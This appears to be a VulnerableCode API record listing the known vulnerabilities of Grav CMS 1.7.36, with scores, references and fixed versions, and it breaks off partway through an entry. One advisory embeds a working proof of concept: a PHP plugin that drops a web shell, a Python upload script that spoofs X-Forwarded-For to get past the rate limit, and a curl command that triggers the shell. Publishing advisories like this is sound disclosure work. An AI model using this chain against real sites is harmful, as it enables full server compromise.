Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/656705?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/656705?format=api", "purl": "pkg:composer/getgrav/grav@1.7.36", "type": "composer", "namespace": "getgrav", "name": "grav", "version": "1.7.36", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "2.0.0-beta.4", "latest_non_vulnerable_version": "2.0.0-rc.2", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47317?format=api", "vulnerability_id": "VCID-1ps5-3k43-p3fa", "summary": "Server Side Template Injection (SSTI)\nGrav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28117", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65566", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28117" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T19:11:01Z/" } ], "url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28117", "reference_id": "CVE-2024-28117", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28117" }, { "reference_url": "https://github.com/advisories/GHSA-qfv4-q44r-g7rv", "reference_id": "GHSA-qfv4-q44r-g7rv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qfv4-q44r-g7rv" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv", "reference_id": "GHSA-qfv4-q44r-g7rv", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T19:11:01Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api", "purl": "pkg:composer/getgrav/grav@1.7.45", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45" } ], "aliases": [ "CVE-2024-28117", "GHSA-qfv4-q44r-g7rv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1ps5-3k43-p3fa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47304?format=api", "vulnerability_id": "VCID-4a2z-37a3-2qaw", "summary": "Server Side Template Injection (SSTI) via Twig escape handler\nDue to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28119", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01406", "scoring_system": "epss", "scoring_elements": "0.80836", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28119" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/" } ], "url": "https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe" }, { "reference_url": "https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/" } ], "url": "https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28119", "reference_id": "CVE-2024-28119", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28119" }, { "reference_url": "https://github.com/advisories/GHSA-2m7x-c7px-hp58", "reference_id": "GHSA-2m7x-c7px-hp58", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2m7x-c7px-hp58" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58", "reference_id": "GHSA-2m7x-c7px-hp58", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api", "purl": "pkg:composer/getgrav/grav@1.7.45", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45" } ], "aliases": [ "CVE-2024-28119", "GHSA-2m7x-c7px-hp58" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4a2z-37a3-2qaw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49312?format=api", "vulnerability_id": "VCID-5kr2-3ywy-9kcn", "summary": "Grav vulnerable to Denial of Service via Improper Input Handling in 'Supported' Parameter\nA Denial of Service (DoS) vulnerability was identified in the **\"Languages\"** submenu of the Grav **admin configuration panel** (`/admin/config/system`). Specifically, the `Supported` parameter fails to properly validate user input. If a malformed value is inserted—such as a single forward slash (`/`) or an XSS test string—it causes a fatal regular expression parsing error on the server.\n\nThis leads to application-wide failure due to the use of the `preg_match()` function with an **improperly constructed regular expression**, resulting in the following error:\n\n`preg_match(): Unknown modifier 'o' File: /system/src/Grav/Common/Language/Language.php line 244`\n\nOnce triggered, the site becomes completely unavailable to all users.\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66305", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20497", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66305" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:14:17Z/" } ], "url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66305", "reference_id": "CVE-2025-66305", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66305" }, { "reference_url": "https://github.com/advisories/GHSA-m8vh-v6r6-w7p6", "reference_id": "GHSA-m8vh-v6r6-w7p6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m8vh-v6r6-w7p6" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6", "reference_id": "GHSA-m8vh-v6r6-w7p6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:14:17Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66305", "GHSA-m8vh-v6r6-w7p6" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5kr2-3ywy-9kcn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95067?format=api", "vulnerability_id": "VCID-6a4v-d3zb-67cq", "summary": "Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature\n### Summary\nAn authenticated user with administrative privileges can achieve Remote Code Execution (RCE) by uploading a specially crafted ZIP file through the \"Direct Install\" tool. While the system attempts to block direct .php file uploads, it fails to inspect the contents of uploaded ZIP archives. Once a malicious plugin is extracted, it can execute arbitrary PHP code or drop a persistent web shell on the server.\n\n### Details\n\nThe vulnerability exists in the handling of the directInstall task within the Admin plugin and the Grav Package Manager (GPM) core.\n\n- Vulnerable Endpoints: /admin/tools/direct-install\n- Vulnerable Logic: AdminController.php (lines 1247-1295) and Gpm.php (lines 214-285).\n- Root Cause: The function Installer::install() (called in Gpm.php:291) extracts the contents of the ZIP file directly into the /user/\n\nplugins/ or /user/themes/ directories without validating the file extensions or the content of the files inside the archive.\n\n### PoC\n1. Prepare the Malicious Plugin\n\nCreate a directory named shellplugin and add the following files:\n\nshellplugin.php:\n```\n\n<?php\nnamespace Grav\\Plugin;\nuse Grav\\Common\\Plugin;\n\nclass ShellpluginPlugin extends Plugin {\n public static function getSubscribedEvents(): array {\n return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];\n }\n public function onPluginsInitialized(): void {\n $shell_path = GRAV_ROOT . '/shell.php';\n if (!file_exists($shell_path)) {\n file_put_contents($shell_path, '<?php system($_GET[\"cmd\"]); ?>');\n }\n }\n}\n\n```\n(Also include a basic blueprints.yaml and shellplugin.yaml as per Grav standards).\n\n2. Create the ZIP Archive\n```\n`zip -r /tmp/shellplugin.zip shellplugin/`\n\n3. Execute the Exploit Script\nRun the following Python script to automate the login, nonce retrieval, and malicious upload process:\n\n`import requests, re, json\n\n\ns = requests.Session()\nBASE_URL = 'http://127.0.0.1'\n```\n\n#### 1. Login and Bypass Rate Limit via X-Forwarded-For\n```\nr = s.get(f'{BASE_URL}/admin')\nnonce = re.search(r'name=\"login-nonce\" value=\"([^\"]+)\"', r.text).group(1)\n\nr2 = s.post(f'{BASE_URL}/admin',\n headers={'X-Forwarded-For': '10.0.0.3'},\n data={'data[username]': 'admin', 'data[password]': 'admin_password_here', 'task': 'login', 'login-nonce': nonce},\n allow_redirects=False)\n\nredirect = json.loads(r2.text)['redirect']\ns.get(redirect)\nprint(f\"[+] Logged in successfully.\")\n\n```\n#### 2. Extract Admin Nonce from Tools Page\n```\ntools = s.get(f'{BASE_URL}/admin/tools/direct-install')\nadmin_nonce = re.search(r'admin-nonce.*?value=\"([a-f0-9]{32})\"', tools.text).group(1)\nprint(f\"[+] Retrieved Admin Nonce: {admin_nonce}\")\n```\n\n#### 3. Upload and Execute\n```\nwith open('/tmp/shellplugin.zip', 'rb') as f:\n zip_data = f.read()\n\nresp = s.post(f'{BASE_URL}/admin/tools/direct-install',\n data={'task': 'directInstall', 'admin-nonce': admin_nonce},\n files={'uploaded_file': ('shellplugin.zip', zip_data, 'application/zip')},\n headers={'X-Forwarded-For': '10.0.0.3'}\n)\n\nif \"installation\" in resp.text.lower():\n print(\"[+] Plugin installed successfully!\")\n # Trigger the shell\n s.get(BASE_URL) \n print(f\"[+] RCE Check: {BASE_URL}/shell.php?cmd=id\")`\n```\n \n#### 4. Verification\nAccess the dropped shell to confirm command execution:\n`curl -s \"http://127.0.0.1/shell.php?cmd=whoami\"`\n\n<img width=\"2547\" height=\"756\" alt=\"resim (2)\" src=\"https://github.com/user-attachments/assets/6a8c25f1-9a9d-469f-ab68-3c7007e446d4\" />\n\n<img width=\"898\" height=\"89\" alt=\"resim (3)\" src=\"https://github.com/user-attachments/assets/ec097785-1196-47a4-b24e-82fcbf0f7520\" />\n\n\n### Impact\n\n- Vulnerability Type: Remote Code Execution (RCE) / Path Traversal (via extraction).\n- Who is impacted: Any Grav installation where the Admin plugin is enabled and an attacker has gained administrative access (or an administrator is tricked into uploading a malicious ZIP).\n- Severity: Critical. Although it requires admin privileges, the ability to gain full server control (system-level access) makes this a high-impact finding, especially in multi-user environments or via CSRF/Session hijacking.\n\n## Maintainer note — partial fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) — ships in **2.0.0-beta.2**.\n\n**What changed (path layer):** `Installer::unZip` now pre-validates every entry name before calling `ZipArchive::extractTo`, and aborts the install if any entry looks like a Zip Slip primitive — `..` path segments, absolute paths (Unix `/…` or Windows `C:\\…`/`\\…`), or NUL bytes. A crafted ZIP can no longer write files outside the target `user/plugins/<slug>` or `user/themes/<slug>` directory.\n\n**Explicit scope limitation:** the \"well-formed but malicious plugin code\" angle of the PoC — uploading a plugin whose own PHP is the payload — is **not** addressed by this change. `directInstall` is an administrator-only operation whose explicit purpose is to install arbitrary PHP; defending against it would require a plugin-signing or marketplace-allowlist feature, which is a separate roadmap item. Administrators should only install plugins from trusted sources. This is now explicitly documented in the commit note.\n\n**Files:**\n- [`system/src/Grav/Common/GPM/Installer.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/GPM/Installer.php) — new `isSafeArchiveEntry()` helper + pre-extract validation loop.\n- [`tests/unit/Grav/Common/Security/ZipSlipSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/ZipSlipSecurityTest.php) — 21 cases covering Unix/Windows/URL-encoded traversal primitives and legitimate plugin names.\n\n---\n\n### Acknowledgements\nThe issue was identified by Security Researcher **Mustafa Murat Akgül**.\n\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42607", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00455", "scoring_system": "epss", "scoring_elements": "0.64206", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42607" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:46:17Z/" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:46:17Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42607", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42607" }, { "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/52578.py", "reference_id": "CVE-2026-42607", "reference_type": "exploit", "scores": [], "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/52578.py" }, { "reference_url": "https://github.com/advisories/GHSA-w48r-jppp-rcfw", "reference_id": "GHSA-w48r-jppp-rcfw", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-w48r-jppp-rcfw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42607", "GHSA-w48r-jppp-rcfw" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6a4v-d3zb-67cq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95186?format=api", "vulnerability_id": "VCID-6quf-qqqk-43a1", "summary": "Grav is Vulnerable to Stored XSS via Tag Injection\n### Summary\nA low-privileged (with the ability to create a page) user can cause XSS with the injection of `svg` element. The XSS can further be escalated to dump the entire system information available under `/admin/config/info` whenever a Super Admin visits the page; which can further be chained with the use of admin-nonce to do a complete server compromise (RCE).\n\n### Details\nAffected endpoint: `admin/pages/<page>`\nAffected code: `system/src/Grav/Common/Security.php`\n\n```php\n public static function detectXss($string, array $options = null): ?string\n {\n // Skip any null or non string values\n if (null === $string || !is_string($string) || empty($string)) {\n return null;\n }\n\n if (null === $options) {\n $options = static::getXssDefaults();\n }\n\n $enabled_rules = (array)($options['enabled_rules'] ?? null);\n $dangerous_tags = (array)($options['dangerous_tags'] ?? null);\n if (!$dangerous_tags) {\n $enabled_rules['dangerous_tags'] = false;\n }\n $invalid_protocols = (array)($options['invalid_protocols'] ?? null);\n if (!$invalid_protocols) {\n $enabled_rules['invalid_protocols'] = false;\n }\n $enabled_rules = array_filter($enabled_rules, static function ($val) { return !empty($val); });\n if (!$enabled_rules) {\n return null;\n }\n\n // Keep a copy of the original string before cleaning up\n $orig = $string;\n\n // URL decode\n $string = urldecode($string);\n\n // Convert Hexadecimals\n $string = (string)preg_replace_callback('!(&#|\\\\\\)[xX]([0-9a-fA-F]+);?!u', static function ($m) {\n return chr(hexdec($m[2]));\n }, $string);\n\n // Clean up entities\n $string = preg_replace('!(&#[0-9]+);?!u', '$1;', $string);\n\n // Decode entities\n $string = html_entity_decode($string, ENT_NOQUOTES | ENT_HTML5, 'UTF-8');\n\n // Strip whitespace characters\n $string = preg_replace('!\\s!u', ' ', $string);\n $stripped = preg_replace('!\\s!u', '', $string);\n\n // Set the patterns we'll test against\n $patterns = [\n // Match any attribute starting with \"on\" or xmlns\n 'on_events' => '#(<[^>]+[a-z\\x00-\\x20\\\"\\'\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\'\\\"].*[\\s|\\'\\\"]>#iUu',\n\n // Match javascript:, livescript:, vbscript:, mocha:, feed: and data: protocols\n 'invalid_protocols' => '#(' . implode('|', array_map('preg_quote', $invalid_protocols, ['#'])) . ')(:|\\&\\#58)\\S.*?#iUu',\n\n // Match -moz-bindings\n 'moz_binding' => '#-moz-binding[a-z\\x00-\\x20]*:#u',\n\n // Match style attributes\n 'html_inline_styles' => '#(<[^>]+[a-z\\x00-\\x20\\\"\\'\\/])(style=[^>]*(url\\:|x\\:expression).*)>?#iUu',\n\n // Match potentially dangerous tags\n 'dangerous_tags' => '#</*(' . implode('|', array_map('preg_quote', $dangerous_tags, ['#'])) . ')[^>]*>?#ui'\n ];\n\n // Iterate over rules and return label if 